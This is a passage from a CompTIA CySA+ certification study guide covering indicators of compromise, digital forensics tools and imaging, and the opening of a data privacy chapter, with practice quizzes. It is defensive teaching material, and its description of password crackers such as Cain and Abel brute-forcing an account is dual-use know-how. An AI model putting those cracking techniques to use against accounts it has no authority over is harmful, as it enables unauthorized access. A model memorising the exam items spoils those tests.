• Port scans: Once all live hosts are identified, a
port scan attempts to connect to every port on
each device and report which ports are open, or
“listening.”
• Vulnerability scans: Vulnerability scans are
more comprehensive than the other types of scans
in that they identify open ports and security
weaknesses. The good news is that uncredentialed
scans expose less information than credentialed
scans. An uncredentialed scan is a scan in
which the scanner lacks administrative privileges
on the device it is scanning.
Unusual Traffic Spike
Any unusual spikes in traffic that are not expected
should be cause for alarm. Just as an increase in
bandwidth usage may indicate DoS or DDoS activity,
unusual spikes in traffic may also indicate this type of
activity. Again, know what your traffic patterns are and
create a baseline of this traffic rhythm. With traffic
spikes, there are usually accompanying symptoms such
as network slowness and, potentially, alarms from any
IPSs or IDSs you have deployed.
Keep in mind that there are other legitimate reasons for
traffic spikes. The following are some of the normal
activities that can cause these spikes:
• Backup traffic in the LAN
• Virus scanner updates
• Operating system updates
• Mail server issues
Common Protocol over Nonstandard Port
Common protocols such as FTP, SMTP, and SNMP use
default port numbers that have been standardized.
However, it is possible to run these protocols over
different port numbers. Whenever you discover this
being done, you should treat the transmission with
suspicion because often there is no reason to use a nonstandard port unless you are trying to obscure what you
are doing. It also is a way of evading ACLs that prevent
traffic on the default standard ports. Be aware, though,
that running a common protocol over a non-standard
port also is used legitimately to prevent DoS attacks on
default standard ports by shifting a well-known service
to a non-standard port number. So, it is a technique used
by both sides.
HOST-RELATED INDICATORS
OF COMPROMISE
While many indicators of compromise are network
related, some are indications that something is wrong at
the system or host level. These are behaviors of a single
system or host rather than network symptoms.
Processor Consumption
When the processor is very busy with very little or
nothing running to generate the activity, it could be a
sign that the processor is working on behalf of malicious
software. Processor consumption was covered in Chapter
13, “The Importance of Proactive Threat Hunting.”
Memory Consumption
Another key indicator of a compromised host is
increased memory consumption. Memory consumption
was also covered in Chapter 13.
Drive Capacity Consumption
Available disk space on the host decreasing for no
apparent reason is cause for concern. It could be that the
host is storing information to be transmitted at a later
time. Some malware also causes an increase in drive
availability due to deleting files. Finally, in some cases,
the purpose is to fill the drive as part of a DoS or DDoS
attack. One of the difficult aspects of this is that the drive
is typically filled with files that cannot be seen or that are
hidden. When users report a sudden filling of their hard
drive and even a slow buildup over time that cannot be
accounted for, you should scan the device for malware in
Safe Mode. Scanning with multiple products is advised
as well.
Unauthorized Software
The presence of any unauthorized software should
be another red flag. If you have invested in a
vulnerability scanner, you can use it to create a list of
installed software that can be compared to a list of
authorized software. Unfortunately, many types of
malware do a great job of escaping detection.
One of the ways to prevent unauthorized software is
through the use of Windows AppLocker. By using this
tool, you can create whitelists, which specify the only
applications that are allowed, or you can create a
blacklist, specifying which applications cannot be run.
Figure 17-4 shows a Windows AppLocker rule being
created. This particular rule is based on the path to the
application, but it could also be based on the publisher of
the application or on a hash value of the application file.
This particular rule is set to allow the application in the
path, but it could also be set to deny that application.
Once the policy is created, it can be applied as widely as
desired in the Active Directory infrastructure.
Figure 17-4 Create Executable Rules
The following are additional general guidelines for
preventing unwanted software:
• Keep the granting of administrative privileges to a
minimum.
• Audit the presence and use of applications.
(AppLocker can do this.)
Malicious Process
Malicious programs use processes to access the CPU, just
as normal programs do. This means their processes are
considered malicious processes. You can sometimes
locate processes that are using either CPU or memory by
using Task Manager, but again, many malware programs
don’t show up in Task Manager. Either Process Explorer
or some other tool may give better results than Task
Manager. If you locate an offending process and end that
process, don’t forget that the program is still there, and
you need to locate it and delete all of its associated files
and registry entries.
Unauthorized Change
If an organization has a robust change control process,
there should be no unauthorized changes made to
devices. Whenever a user reports an unauthorized
change in his device, it should be investigated. Many
malicious programs make changes that may be apparent
to the user. Missing files, modified files, new menu
options, strange error messages, and odd system
behavior are all indications of unauthorized changes.
Unauthorized Privilege
Unauthorized changes can be the result of privilege
escalation. Check all system accounts for changes to the
permissions and rights that should be assigned, paying
special attention to new accounts with administrative
privileges. When assigning permissions, always exercise
the concept of least privilege. Also ensure that account
reviews take place on a regular basis to identify privileges
that have been escalated and accounts that are no longer
needed.
Data Exfiltration
Data exfiltration is the theft of data from a device.
Any reports of missing or deleted data should be
investigated. In some cases, the data may still be present,
but it has been copied and transmitted to the attacker.
Software tools are available to help track the movement
of data in transmissions.
Abnormal OS Process Behavior
When an operating system is behaving strangely and not
operating normally, it could be that the operating system
needs to be reinstalled or that it has been compromised
by malware in some way. While all operating systems
occasionally have issues, persistent issues or issues that
are typically not seen or have never been seen could
indicate a compromised operating system.
File System Change or Anomaly
If file systems change, especially system files (those that
are part of the operating system), it is not a good sign.
System files should not change from the day the
operating system was installed, and if they do, it is an
indication of malicious activity. Many systems offer the
ability to verify the integrity of system files. For example,
the System File Checker (SFC) is a utility built into the
Windows 10 operating system that will check for and
repair operating system file corruption.
Registry Change or Anomaly
Most registry changes are made through using tools such
as Control Panel, and changes are rarely made directly to
the registry using the Registry Editor. Changes to
registry settings are common when a compromise has
occurred. Changes to the registry are not obvious and
can remain hidden for long periods of time. You need
tools to help identify infected settings in the registry and
to identify the last saved settings. Examples include
Microsoft’s Sysinternals Autoruns and Silent
Runners.vbs.
Unauthorized Scheduled Task
In some cases, malware can generate a task that is
scheduled to occur on a regular basis, like
communicating back to the hacker at certain intervals or
copying file locations at certain intervals. Any scheduled
task that was not configured by the local team is a sign of
compromise. Access to Scheduled Tasks can be
controlled through the use of Group Policy.
APPLICATION-RELATED
INDICATORS OF
COMPROMISE
In some cases, symptoms are not present on the network
or in the activities of the host operating system, but they
are present in the behavior displayed by a compromised
application. Some of these indicators are covered in the
following sections.
Anomalous Activity
When an application is behaving strangely and not
operating normally, it could be that the application needs
to be reinstalled or that it has been compromised by
malware in some way. While all applications occasionally
have issues, persistent issues or issues that are typically
not seen or have never been seen could indicate a
compromised application.
Introduction of New Accounts
Some applications have their own account database. In
that case, you may find accounts that didn’t previously
exist in the database—and this should be a cause for
alarm and investigation. Many application compromises
create accounts with administrative access for the use of
a malicious individual or for the processes operating on
his behalf.
Unexpected Output
When the output from a program is not what is normally
expected and when dialog boxes are altered or the order
in which the boxes are displayed is not correct, it is an
indication that the application has been altered. Reports
of strange output should be investigated.
Unexpected Outbound
Communication
Any unexpected outbound traffic should be investigated,
regardless of whether it was discovered as a result of
network monitoring or as a result of monitoring the host
or application. With regard to the application, it can
mean that data is being transmitted back to the
malicious individual.
Service Interruption
When an application stops functioning with no apparent
problem, or when an application cannot seem to
communicate in the case of a distributed application, it
can be a sign of a compromised application. Any such
interruptions that cannot be traced to an application,
host, or network failure should be investigated.
Application Log
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” covered the event logs in
Windows. One of those event logs is dedicated to errors
and issues related to applications, the Application log.
This log focuses on the operation of Windows
applications. Events in this log are classified as error,
warning, or information, depending on the severity of
the event. The Application log in Windows 10 is shown in
Figure 17-5.
Figure 17-5 Application Log
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 17-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 17-2 Key Topics for Chapter 17
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
indicators of compromise (IoCs)
beaconing
traditional botnet
peer-to-peer botnet
wireless key loggers
rogue device
wireless intrusion prevention system (WIPS)
ping sweeps
port scans
vulnerability scans
uncredentialed scan
data exfiltration
Application log
REVIEW QUESTIONS
1. __________________ refers to traffic that
leaves a network at regular intervals.
2. List at least two network-related IoCs.
3. Match the following terms with their definitions.
4. The ____________________ focuses on the
operation of Windows applications.
5. List at least two host-related IoCs.
6. Match the following terms with their definitions.
7. _________________ enables you to look at the
graphs that are similar to Task Manager and
identify what caused spikes in the past, which is
not possible with Task Manager alone.
8. List at least two application-related IoCs.
9. Match the following terms with their definitions.
10. A(n) ______________________ is a scan in
which the scanner lacks administrative privileges
on the device it is scanning.
Chapter 18. Utilizing Basic
Digital Forensics
Techniques
This chapter covers the following topics related
to Objective 4.4 (Given a scenario, utilize basic
digital forensics techniques) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Network: Covers network protocol analyzing
tools including Wireshark and tcpdump
• Endpoint: Discusses disk and memory digital
forensics
• Mobile: Covers mobile forensics techniques
• Cloud: Includes forensic techniques in the cloud
• Virtualization: Covers issues and forensics
unique to virtualization
• Legal hold: Describes the legal concept of
retaining information for legal purposes
• Procedures: Covers forensic procedures
• Hashing: Describes forensic verification,
including changes to binaries
• Carving: Describes the process of carving that
allows the recovery of files
• Data acquisition: Covers data acquisition
processes
Over time, techniques have been developed to perform a
forensic examination of a compromised system or
network. Security professionals should use these timetested processes to guide the approach to gathering
digital evidence. This chapter explores many of these
basic techniques.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 18-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 18-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a packet analyzer?
a. Wireshark
b. FTK
c. Helix
d. Cain and Abel
2. Which of the following groups is a password
cracking tool?
a. Wireshark
b. FTK
c. Helix
d. Cain and Abel
3. Which of the following is a data acquisition tool?
a. MD5
b. EnCase
c. Cellebrite
d. dd
4. Which of the following is not true of the cloudbased approach to vulnerability scanning?
a. Installation costs are lower than with a
premises-based solutions.
b. Maintenance costs are higher than with a
premises-based solutions.
c. Upgrades are included in a subscription.
d. It does not require the client to provide onsite
equipment.
5. Which of the following is false with respect to using
forensic tools for the virtual environment?
a. The same tools can be used as in a physical
environment.
b. Knowledge of the files that make up a VM is
critical.
c. Requires deep knowledge of the log files created
by the various components.
d. Requires access to the hypervisor code.
6. Which of the following often requires that
organizations maintain archived data for longer
periods?
a. Chain of custody
b. Lawful intercept
c. Legal hold
d. Discovery
7. Which if the following items in a digital forensic
investigation suite is used to make copies of a hard
drive?
a. Imaging utilities
b. Analysis utilities
c. Hashing utilities
d. Password crackers
8. Which of the following is the strongest hashing
utility?
a. MD5
b. MD6
c. SHA-1
d. SHA-3
9. Which of the following types of file carving is not
supported by Forensic Explorer?
a. Cluster-based file carving
b. Sector-based file carving
c. Byte-based file carving
d. Partition-based file carving
10. Which of the following is a data acquisition tool for
smartphones?
a. MD5
b. EnCase
c. Cellebrite
d. dd
FOUNDATION TOPICS
NETWORK
During both environmental reconnaissance testing and
when performing forensic investigations, security
analysts have a number of tools at their disposal, and it’s
no coincidence that many of them are the same tools that
hackers use. The following sections cover the most
common network tools and describe the types of
information you can determine about the security of the
environment by using each tool.
Wireshark
A packet (or protocol) analyzer can be a standalone
device or software running on a laptop computer. One of
the most widely used software-based protocol analyzers
is Wireshark. It captures raw packets off the interface
on which it is configured and allows you to examine each
packet. If the data is unencrypted, you can read the data.
Figure 18-1 shows an example of Wireshark in use. You
can use a protocol analyzer to capture traffic flowing
through a network switch by using the port mirroring
feature of a switch. You can then examine the captured
packets to discern the details of communication flows.
Figure 18-1 Wireshark
In the output shown in Figure 18-1, each line represents
a packet captured on the network. You can see the source
IP address, the destination IP address, the protocol in
use, and the information in the packet. For example, line
511 shows a packet from 10.68.26.15 to 10.68.16.127,
which is a NetBIOS name resolution query. Line 521
shows an HTTP packet from 10.68.26.46 to a server at
108.160.163.97. Just after that, you can see the server
sending an acknowledgment back. To read a packet, you
click the single packet. If the data is cleartext, you can
read and analyze it. So you can see how an attacker could
use Wireshark to acquire credentials and other sensitive
information. Protocol analyzers can be of help whenever
you need to see what is really happening on your
network. For example, say you have a security policy that
mandates certain types of traffic should be encrypted,
but you are not sure that everyone is complying with this
policy. By capturing and viewing the raw packets on the
network, you can determine whether users are
compliant.
Figure 18-2 shows additional output from Wireshark.
The top panel shows packets that have been captured.
The line numbered 384 has been chosen, and the parts of
the packet are shown in the middle pane. In this case, the
packet is a response from a DNS server to a device that
queried for a resolution. The bottom pane shows the
actual data in the packet and, because this packet is not
encrypted, you can see that the user was requesting the
IP address for www.cnn.com. Any packet not encrypted
can be read in this pane.
Figure 18-2 Analyzing Wireshark Output
During environmental reconnaissance testing, you can
use packet analyzers to identify traffic that is
unencrypted but should be encrypted (as previously
mentioned), protocols that should not be in use on the
network, and other abnormalities. You can also use these
tools to recognize certain types of attacks. Figure 18-3
shows Wireshark output which indicates that a SYN
flood attack is underway. Notice the lines highlighted in
gray. These are all SYN packets sent to 10.1.0.2, and they
are part of a SYN flood. Notice that the target device is
answering with RST/ACK packets, which indicates that
the port is closed (lines highlighted in red). One of the
SYN packets (highlighted in blue) is open, so you can
view its details in the bottom pane. You can expand this
pane and read the information from all four layers of the
TCP model. Currently the transport layer is expanded.
Figure 18-3 SYN Flood Displayed in Wireshark
tcpdump
tcpdump is a command-line tool that can capture
packets on Linux and Unix platforms. A version for
Windows, windump, is available as well. Using it is a
matter of selecting the correct parameter to go with the
tcpdump command. For example, the following
command enables a capture (-i) on the Ethernet 0
interface.
tcpdump -i eth0
To explore the many other switches that are available for
tcpdump, see www.tcpdump.org/tcpdump_man.html.
ENDPOINT
Forensic tools are used in the process of collecting
evidence during a cyber investigation. Many of these
tools are used to obtain evidence from endpoints.
Included in this category are forensic investigation
suites, hashing utilities, password cracking tools, and
imaging tools.
Disk
Many tools are dedicated to retrieving evidence from a
hard drive. Others are used to work with the data found
on the hard drive. The following tools are all related in
some form or fashion to obtaining evidence from a hard
drive.
FTK
Forensic Toolkit (FTK) is a commercial toolkit that
can scan a hard drive for all sorts of information. This kit
also includes an imaging tool and an MD5 hashing
utility. It can locate relevant evidence, such as deleted emails. It also includes a password cracker and the ability
to work with rainbow tables.
For more information on FTK, see
https://accessdata.com/products-services/forensictoolkit-ftk.
Helix3
Helix3 comes as a live CD that can be mounted on a
host without affecting the data on the host. From the live
CD you can acquire evidence and make drive images.
This product is sold on a subscription basis by e-fense.
For more information on Helix, see www.efense.com/products.php.
Password Cracking
In the process of executing a forensic investigation, it
may be necessary to crack passwords. Often files have
been encrypted or password protected by malicious
individuals, and you need to attempt to recover the
password. There are many, many password cracking
utilities out there; the following are two of the most
popular ones:
• John the Ripper: John the Ripper is a password
cracker that can work in Unix/Linux as well as
macOS systems. It detects weak Unix passwords,
though it supports hashes for many other
platforms as well. John the Ripper is available in
three versions: an official free version, a
community-enhanced version (with many
contributed patches but not as much quality
assurance), and an inexpensive pro version. One
mitigation for this attack is the Hash Suite for
Windows.
• Cain and Abel: One of the most well-known
password cracking programs, Cain and Abel can
recover passwords by sniffing the network; crack
encrypted passwords using dictionary, bruteforce, and cryptanalysis attacks; record VoIP
conversations; decode scrambled passwords;
reveal password boxes; uncover cached
passwords; and analyze routing protocols. Figure
18-4 shows sample output from this tool. As you
can see, an array of attacks can be performed on
each located account. This example shows a scan
of the local machine for user accounts in which
the program has located three accounts: Admin,
Sharpy, and JSmith. By right-clicking the Admin
account, you can use the program to perform a
brute-force attack—or a number of other attacks—
on that account.
Figure 18-4 Cain and Abel
Imaging
Before you perform any analysis on a target disk in an
investigation, you should make a bit-level image of the
disk so that you can conduct the analysis on that copy.
Therefore, a forensic imaging utility should be part of
your toolkit. There are many forensic imaging utilities,
and many of the forensic investigation suites contain
them. Moreover, many commercial forensic workstations
have these utilities already loaded.
The dd command is a Linux command that is used is to
convert and copy files. The U.S. Department of Defense
created a fork (a variation) of this command called
dcfldd that adds additional forensic functionality. By
simply using dd with the proper parameters and the
correct syntax, you can make an image of a disk, but
dcfldd enables you to also generate a hash of the source
disk at the same time. For example, the following
command reads 5 GB from the source drive and writes
that to a file called mymage.dd.aa:
dcfldd if=/dev/sourcedrive hash=md5,sha256
hashwindow=10G
md5log=hashmd5.txt sha256log=hashsha.txt \
hashconv=after bs=512
conv=noerror,sync split=5G splitformat=aa
of=myimage.dd
This example also calculates the MD5 hash and the SHA256 hash of the 5-GB chunk. It then reads the next 5 GB
and names that myimage.dd.ab. The MD5 hashes are
stored in a file called hashmd5.txt, and the SHA-256
hashes are stored in a file called hashsha.txt. The block
size for transferring has been set to 512 bytes, and in the
event of read errors, dcfldd writes zeros.
Memory
Many penetration testing tools perform an operation
called a core dump or memory dump. Applications store
information in memory, and this information can
include sensitive data, passwords, usernames, and
encryption keys. Hackers can use memory-reading tools
to analyze the entire memory content used by an
application. Any vulnerability testing should take this
into consideration and utilize the same tools to identify
any issues in the memory of an application. The
following are some examples of memory-reading tools:
• Memdump: This free tool runs on Windows,
Linux, and Solaris. It simply creates a bit-by-bit
copy of the volatile memory on a system.
• KnTTools: This memory acquisition and analysis
tool used with Windows systems captures physical
memory and stores it to a removable drive or
sends it over the network to be archived on a
separate machine.
• FATKit: This popular memory forensic tool
automates the process of extracting interesting
data from volatile memory. FATKit helps an
analyst visualize the objects it finds to help in
understanding the data that the tool was able to
find.
Runtime debugging, on the other hand, is the process
of using a programming tool to not only identify
syntactic problems in code but also discover weaknesses
that can lead to memory leaks and buffer overflows.
Runtime debugging tools operate by examining and
monitoring the use of memory. These tools are specific to
the language in which the code was written. Table 18-2
shows examples of runtime debugging tools and the
operating systems and languages for which they can be
used.
Table 18-2 Runtime Debugging Tools
Memory dumping can help determine what a hacker
might be able to learn if she were able to cause a memory
dump. Runtime debugging would be the correct
approach for discovering syntactic problems in an
application’s code or to identify other issues, such as
memory leaks or potential buffer overflows.
MOBILE
As the use of mobile devices has increased, so has the
involvement of these devices in security incidents. The
following tools, among others, have been created to help
obtain evidence from mobile devices:
• Cellebrite: Cellebrite has found a niche by
focusing on collecting evidence from
smartphones. It makes extraction devices that can
be used in the field and software that does the
same things. These extraction devices collect
metadata from memory and attempt to access the
file system by bypassing the lock mechanism.
They don’t modify any of the data on the devices,
which makes this a forensically “clean” solution.
The device looks like a tablet, and you simply
connect a phone to it via USB. For more
information, see https://www.cellebrite.com.
• Susteen Secure View 4: This mobile forensic
tool is used by many police departments. It
enables users to fully export and report on all
information found on the mobile device. It can
create evidence reports based only on the
information that you find is relevant to your case.
This includes deleted data, all files (pictures,
videos, documents, etc.), messages, and more. See
https://www.secureview/secure_view.html for
details.
• MSAB XRY: This digital forensics and mobile
device forensics product by the Swedish company
MSAB is used to analyze and recover information
from mobile devices such as mobile phones,
smartphones, GPS navigation tools, and tablet
computers. Check out XRY at
https://www.msab.com/products/xry/.
CLOUD
In Chapter 4, “Analyzing Assessment Output,” you
learned about some cloud tools for vulnerability
assessments, and in Chapter 8, “Security Solutions for
Infrastructure Management,” you learned about cloud
anti-malware systems. Let’s look a bit more at cloud
vulnerability scanning.
Cloud-based vulnerability scanning is a service
performed from the vendor’s cloud and is a good
example of Software as a Service (SaaS). The benefits
here are the same as the benefits derived from any SaaS
offering—that is, no equipment on the part of the
subscriber and no footprint in the local network. Figure
18-5 shows a premises-based approach to vulnerability
scanning, and Figure 18-6 shows a cloud-based solution.
In the premises-based approach, the hardware and/or
software vulnerability scanners and associated
components are entirely installed on the client premises,
while in the cloud-based approach, the vulnerability
management platform is in the cloud. Vulnerability
scanners for external vulnerability assessments are
located at the solution provider’s site, with additional
scanners on the premises.
Figure 18-5 Premises-Based Scanning
Figure 18-6 Cloud-Based Scanning
The following are the advantages of the cloud-based
approach:
• Installation costs are low because there is no
installation and configuration for the client to
complete.
• Maintenance costs are low because there is only
one centralized component to maintain, and it is
maintained by the vendor (not the end client).
• Upgrades are included in a subscription.
• Costs are distributed among all customers.
• It does not require the client to provide onsite
equipment.
However, there is a considerable disadvantage to the
cloud-based approach: Whereas premises-based
deployments store data findings at the organization’s
site, in a cloud-based deployment, the data is resident
with the provider. This means the customer is dependent
on the provider to ensure the security of the vulnerability
data.
Qualys is an example of a cloud-based vulnerability
scanner. Sensors are placed throughout the network, and
they upload data to the cloud for analysis. Sensors can be
implemented as dedicated appliances or as software
instances on a host. A third option is to deploy sensors as
images on virtual machines.
VIRTUALIZATION
In Chapter 8, you learned the basics of virtualization and
how this technology is used in the cloud environment.
With respect to forensic tools for the virtual
environment, the same tools can be used as in a physical
environment. However, the key is knowledge of the files
that make up a VM and how to locate these files. Each
virtualization system has its own filenames and
architecture. Each VM is made up of several files.
Another key aspect of successful forensics in the virtual
environment is deep knowledge of the log files created by
the various components such as the hypervisor and the
guest machine. You need to know not only where these
files are located but also the purpose of each and how to
read and interpret its entries.
LEGAL HOLD
Legal holds are requirements placed on organizations by
legal authorities that require the organization to
maintain archived data for longer periods. Data on a
legal hold must be properly identified, and the
appropriate security controls must be put into place to
ensure that the data cannot be tampered with or deleted.
An organization should have policies regarding any legal
holds that may be in place.
Consider the following scenario: An administrator
receives a notification from the legal department that an
investigation is being performed on members of the
research department, and the legal department has
advised a legal hold on all documents for an unspecified
period of time. Most likely this legal hold will violate the
organization’s data storage policy and data retention
policy. If a situation like this arises, the IT staff should
take time to document the decision and ensure that the
appropriate steps are taken to ensure that the data is
retained and stored for a longer period, if needed.
PROCEDURES
In Chapter 16, “Applying the Appropriate Incident
Response Procedure,” you learned about the incident
response process and its steps. Review those steps as
they are important. This section introduces some case
management tools that can make the process go
smoother.
EnCase Forensic
EnCase Forensic is a case (incident) management tool
that offers built-in templates for specific types of
investigations. These templates are based on workflows,
which are the steps to carry out based on the
investigation type. A workflow leads you through the
steps of triage, collection, decryption, processing,
investigation, and reporting of an incident. For more
information, see
https://www.guidancesoftware.com/encase-forensic.
Sysinternals
Sysinternals is a Windows command-line tool that
contains more than 70 tools that can be used for both
troubleshooting and security issues. Among these are
forensic tools. For more information, see
https://technet.microsoft.com/en-us/sysinternals/.
Forensic Investigation Suite
A forensic investigation suite is a collection of tools
that are commonly used in digital forensic investigations.
A quality forensic investigation suite should include the
following items:
• Imaging utilities: One of the tasks you will be
performing is making copies of storage devices.
For this you need a disk imaging tool. To make
system images, you need to use a tool that creates
a bit-level copy of the system. In most cases, you
must isolate the system and remove it from
production to create this bit-level copy. You
should ensure that two copies of the image are
retained. One copy of the image will be stored to
ensure that an undamaged, accurate copy is
available as evidence. The other copy will be used
during the examination and analysis steps.
Message digests (or hashing digests) should be
used to ensure data integrity.
• Analysis utilities: You need a tool to analyze the
bit-level copy of the system that is created by the
imaging utility. Many of these tools are available
on the market. Often these tools are included in
forensic investigation suites and toolkits, such as
the previously introduced EnCase Forensic, FTK,
and Helix.
• Chain of custody: While hard copies of chain of
custody activities should be kept, some forensic
investigation suites contain software to help
manage this process. These tools can help you
maintain an accurate and legal chain of custody
for all evidence, with or without hard copy (paper)
backup. Some suites perform a dual electronic
signature capture that places both signatures in an
Excel spreadsheet as proof of transfer. Those
signatures are doubly encrypted so that if the
spreadsheet is altered in any way, the signatures
disappear.
• Hashing utilities: These utilities are covered in
the next section.
• OS and process analysis: These tools focus on
the activities of the operating system and the
processes that have been executed. While most
operating systems have tools of some sort that can
report on processes, tools included in a forensic
investigation suite have more robust features and
capabilities.
• Mobile device forensics: Today, many
incidents involve mobile devices. You need
different tools to acquire the required information
from these devices. A forensic investigation suite
should contain tools for this purpose. See the
earlier “Mobile” section for examples.
• Password crackers: Many times investigators
find passwords standing in the way of obtaining
evidence. Password cracking utilities are required
in such instances. Most forensic investigation
suites include several password cracking utilities
for this purpose. Chapter 4, “Analyzing
Assessment Output” lists some of these tools.
• Cryptography tools: An investigator uses these
tools when they encounter encrypted evidence,
which is becoming more common. Some of these
tools can attempt to decrypt the most common
types of encryption (for example, BitLocker,
BitLocker To Go, PGP, TrueCrypt), and they may
also be able to locate decryption keys from RAM
dumps and hibernation files.
• Log viewers: Finally, because much evidence can
be found in the logs located on the device, a robust
log reading utility is also valuable. A log viewer
should have the ability to read all Windows logs as
well as the registry. Moreover, it should also be
able to read logs created by other operating
systems. See the “Log Review” section of Chapter
11, “Analyzing Data as Part of Security Monitoring
Activities.”
HASHING
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also
referred to as message digests, are calculated using the
original message. If the receiver calculates a hash value
that is the same, the original message is intact. If the
receiver calculates a hash value that is different, then the
original message has been altered. Hashing was covered
in Chapter 8.
Hashing Utilities
You must be able to prove that certain evidence has not
been altered during your possession of it. Hashing
utilities use hashing algorithms to create a value that can
be used later to verify that the information is unchanged.
The two most common algorithms used are Message
Digest 5 (MD5) and Secure Hashing Algorithm (SHA).
Changes to Binaries
A binary file is a computer file that is not a text file. The
term “binary file” is often used as a term meaning “nontext file.” These files must be interpreted to be read.
Executable files are often of this type. These file types
can be verified using hashing in the same manner as
described in the prior section.
CARVING
Data carving is a technique used when only fragments
of data are available and when no file system metadata is
available. It is a common procedure when performing
data recovery, after a storage device failure, for instance.
It is also used in forensics.
A file signature is a constant numerical or text value used
to identify a file format. The object of carving is to
identify the file based on this signature information
alone.
Forensic Explorer is a tool for the analysis of electronic
evidence and incudes a data carving tool that searches
for signatures. It offers carving support for more than
300 file types. It supports
• Cluster-based file carving
• Sector-based file carving
• Byte-based file carving
Figure 18-7 shows the File Carving dialog box in Forensic
Explorer.
Figure 18-7 Forensic Explorer
DATA ACQUISITION
Earlier in this chapter, in the section “Forensic
Investigation Suite,” you learned about data acquisition
tools that should be a part of your forensic toolkit. Please
review that section and the balance of this chapter with
regard to forensic tools.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 18-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 18-3 Key Topics in Chapter 18
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
Wireshark
tcpdump
Forensic Toolkit (FTK)
Helix
John the Ripper
Cain and Abel
imaging
dd
Memdump
KnTTools
FATKit
runtime debugging
Cellebrite
Qualys
legal hold
EnCase Forensic
Sysinternals
forensic investigation suite
carving
REVIEW QUESTIONS
1. ___________________ is a command-line tool
that can capture packets on Linux and Unix
platforms.
2. List at least one password cracking utility.
3. Match the following terms with their definitions.
4. The DoD created a fork (a variation) of the dd
command called ___________ that adds
additional forensic functionality.
5. List at least two memory-reading tools.
6. Match the following terms with their definitions.
7. Cellebrite found a niche by focusing on collecting
evidence from ______________.
8. List at least two advantages of the cloud-based
approach to vulnerability scanning.
9. Match the following terms with their definitions.
10. _____________ often require that organizations
maintain archived data for longer periods.
Chapter 19. The
Importance of Data
Privacy and Protection
This chapter covers the following topics related
to Objective 5.1 (Understand the importance of
data privacy and protection) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Privacy vs. security: Compares these two
concepts as they relate to data privacy and
protection
• Non-technical controls: Describes
classification, ownership, retention, data types,
retention standards, confidentiality, legal
requirements, data sovereignty, data
minimization, purpose limitation, and nondisclosure agreement (NDA)
• Technical controls: Covers encryption, data
loss prevention (DLP), data masking,
deidentification, tokenization, digital rights
management (DRM), geographic access
requirements, and access controls
Addressing data privacy and protection issues has
become one of the biggest challenges facing
organizations that handle the information of employees,
customers, and vendors. This chapter explores those data
privacy and protection issues and describes the various
controls that can be applied to mitigate them. New data
privacy laws are being enacted regularly, such as the EU
GDPR, that require new controls to protect data.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks.” Table 19-1 lists the major headings
in this chapter and the “Do I Know This Already?” quiz
questions covering the material in those headings so that
you can assess your knowledge of these specific areas.
The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 19-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following relates to rights to control
the sharing and use of one’s personal information?
a. Security
b. Privacy
c. Integrity
d. Confidentiality
2. Which of the following is a risk assessment that
determines risks associated with PII collection?
a. MTA
b. PIA
c. RSA
d. SLA
3. Third-party personnel should be familiarized with
organizational policies related to data privacy and
should sign which of the following?
a. NDA
b. MOU
c. ICA
d. SLA
4. Which of the following is a measure of how freely
data can be handled?
a. Sensitivity
b. Privacy
c. Secrecy
d. Criticality
5. Which of the following affects any organizations
that handle cardholder information for the major
credit card companies?
a. GLBA
b. PCI DSS
c. SOX
d. HIPAA
6. Which of the following affects all healthcare
facilities, health insurance companies, and
healthcare clearinghouses?
a. GLBA
b. PCI DSS
c. SOX
d. HIPAA
7. Which control provides data confidentiality?
a. Encryption
b. Hashing
c. Redundancy
d. Digital signatures
8. Which control provides data integrity?
a. Encryption
b. Hashing
c. Redundancy
d. Digital signatures
9. Which of the following means altering data from its
original state to protect it?
a. Deidentification
b. Data masking
c. DLP
d. Digital signatures
FOUNDATION TOPICS
PRIVACY VS. SECURITY
Privacy relates to rights to control the sharing and use
of one’s personal information, commonly called
personally identifiable information (PII), as described in
Chapter 15, “The Incident Response Process.” Privacy of
data relies heavily on the security controls that are in
place. While organizations can provide security without
ensuring data privacy, data privacy cannot exist without
the appropriate security controls. A privacy impact
assessment (PIA) is a risk assessment that determines
risks associated with PII collection, use, storage, and
transmission. A PIA should determine whether
appropriate PII controls and safeguards are
implemented to prevent PII disclosure or compromise.
The PIA should evaluate personnel, processes,
technologies, and devices. Any significant change should
result in another PIA review.
As part of prevention of privacy policy violations, any
contracted third parties that have access to PII should be
assessed to ensure that the appropriate controls are in
place. In addition, third-party personnel should be
familiarized with organizational policies and should sign
non-disclosure agreements (NDAs).
NON-TECHNICAL CONTROLS
Non-technical controls are implemented without
technology and consist of the organization’s policies and
procedures for maintaining data privacy and protection.
This section describes some of these non-technical
controls, which are also sometimes called administrative
controls. Non-technical controls are covered in detail in
